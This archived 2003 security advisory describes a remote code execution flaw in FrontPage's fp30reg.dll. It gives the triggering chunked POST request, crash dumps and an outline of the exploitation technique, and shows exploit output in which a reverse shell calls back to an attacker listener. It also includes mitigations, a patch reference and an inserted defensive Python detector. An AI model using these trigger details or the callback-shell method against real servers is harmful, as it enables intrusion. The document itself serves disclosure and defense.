Frontpage Extensions Remote Command Execution

From: Brett Moore (brett.moore_at_SECURITY-ASSESSMENT.COM)
Date: 11/12/03

    Date:         Wed, 12 Nov 2003 13:35:16 +1300
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    ========================================================================
    = Frontpage Extensions Remote Command Execution
    =
    = MS Bulletin posted:
    = http://www.microsoft.com/technet/security/bulletin/ms03-051.asp
    =
    = Affected Software:
    = Microsoft Windows 2000 Service Pack 2, Service Pack 3
    = Microsoft Windows XP, Microsoft Windows XP Service Pack 1
    = Microsoft Office XP, Microsoft Office XP Service Release 1
    =
    = Public disclosure on November 11, 2003
    ========================================================================

    Continuing 'The Methodical Approach To Finding Overflows', we moved to
    the next attack avenue. After the success against nsiislog.dll we were
    again greeted by an access violation message, leading to the discovery
    of another remote vulnerability.

    == Description ==

    Sending a chunked-encoded POST to fp30reg.dll will cause an access
    violation, resulting in the following error log entry.

    ------------------------------------------------------------------------
    Event Type: Warning
    Event Source: W3SVC
    Event Category: None
    Event ID: 37
    Description:
    Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly.
    ------------------------------------------------------------------------

    A chunked-encoded POST results in control of ECX and EDI, with the
    exception occurring at a mov dword ptr [ECX+4],EDI instruction, leading
    to remote command execution with the privileges of the
    IWAM_machinename account.

    == Chunked Transfer-Encoding Post ==

    POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
    Transfer-Encoding: chunked

    PostLength
    PostData
    0
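    The two indicators the advisory gives (a chunked POST to fp30reg.dll on the wire, and the W3SVC Event ID 37 warning when the out-of-process application dies) can be matched mechanically. The detector below is an added example, not part of the original advisory; the sample request text and event-log record it checks are constructed.

```python
"""Detector for the two indicators the advisory gives (added example)."""
import re

# Request path of the affected ISAPI extension, with or without a query string.
FP30REG_PATH = re.compile(r"/fp30reg\.dll(?:[?#]|$)", re.IGNORECASE)
# W3SVC Event ID 37 warning logged when the out-of-process application dies.
OOP_CRASH = re.compile(
    r"Event Source:\s*W3SVC.*?Event ID:\s*37\b.*?terminated unexpectedly",
    re.IGNORECASE | re.DOTALL)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers); body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = head.split("\n")
    parts = lines[0].split(" ")
    method, path = (parts + [""])[:2]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip().lower()
    return method.upper(), path, headers


def is_chunked_post_to_fp30reg(raw):
    """True for a POST to fp30reg.dll carrying Transfer-Encoding: chunked.

    Matches regardless of header/path case, query strings, or a multi-value
    encoding such as 'gzip, chunked'.
    """
    method, path, headers = parse_request(raw)
    if method != "POST" or not FP30REG_PATH.search(path):
        return False
    encodings = [e.strip() for e in headers.get("transfer-encoding", "").split(",")]
    return "chunked" in encodings


def is_oop_crash_event(event_text):
    """True if an event-log record matches the W3SVC Event ID 37 warning."""
    return bool(OOP_CRASH.search(event_text))


# Constructed sample traffic; SUSPECT mirrors the request shape in the advisory.
SUSPECT = ("POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"
           "Host: www.example.test\r\nTransfer-Encoding: chunked\r\n\r\n"
           "5\r\nXXXXX\r\n0\r\n\r\n")
BENIGN = ("GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"
          "Host: www.example.test\r\n\r\n")
```

    A hit from the request check paired with a following Event ID 37 record on the same host is the combination worth alerting on.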

    == Exploitation ==

    [Code Segment]
     67D46AD3 mov ecx,dword ptr [ebx+edx+8]
     67D46AD7 mov edi,dword ptr [ebx+edx+4]
     67D46ADB mov dword ptr [ecx+4],edi

    [Registers]
     EAX = 046F83E8 EBX = 00000010 ECX = 58585858
     EDX = 05450FEC ESI = 0000000C EDI = 58585858
     EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668

    [EDX DUMP]
     05450FEC 11 00 00 00 58 58 58 ....XXX
     05450FF3 58 58 58 58 58 58 58 XXXXXXX
     05450FFA 58 58 58 58 58 58 58 XXXXXXX
     05451001 58 58 58 58 58 58 58 XXXXXXX
     05451008 58 58 58 58 58 58 58 XXXXXXX
     0545100F 58 58 58 58 58 58 58 XXXXXXX
     05451016 58 58 58 58 58 58 58 XXXXXXX

    There are many different ways to exploit this malloc/free scenario, so
    instead of the usual SEH redirect to a JMP instruction, we took a two-step
    approach for higher reliability.

    At the first exception error we are in control of ECX and EDI allowing
    us to write our JMP instruction to a known writeable space. This does
    not cause an exception and execution flow continues through to a CALL
    instruction that uses a value from our buffer. We use this CALL to
    reach our JMP instruction.

    == Exploit Example ==

    %:\>exploit 192.168.1.63

    ** FP30REG.DLL - Ver 4.0.2.5526 - Remote Shell **

    . Calling Home: blackhole:2000
    . Using: 0x---------h as writeable data space
    . Shellcode Size: 304 bytes
    . Preparing Exploit Buffer......Ready
    . Starting Listener On Port: 2000
    . Connecting To 192.168.1.63
    . Sending Exploit......Exploit Sent
    . Connection Received

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    C:\WINNT\system32>whoami
    IWAM_BLACKHOLE
    C:\WINNT\system32>

    == Solutions ==

    - Every day is a 0-day day on the Internet. Limiting the avenues of attack
      can be a key factor in reducing the risk to a web server. Programs such
      as SecureIIS and URLScan should be set up to reduce the number of methods
      that can be used to send data to a server. Removing unnecessary services,
      files and ISAPI extensions reduces the number of listeners that data can
      be fed to, limiting the number of vulnerabilities that a server is
      susceptible to.
    - Install the vendor supplied patch.

    == Credit ==

    Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
    Security-Assessment.com

    == About Security-Assessment.com ==

    Security-Assessment.com is a leader in intrusion testing and security
    code review, and leads the world with SA-ISO, online ISO17799 compliance
    management solution. Security-Assessment.com is committed to security
    research and development, and its team have previously identified a
    number of vulnerabilities in public and private software vendors products.
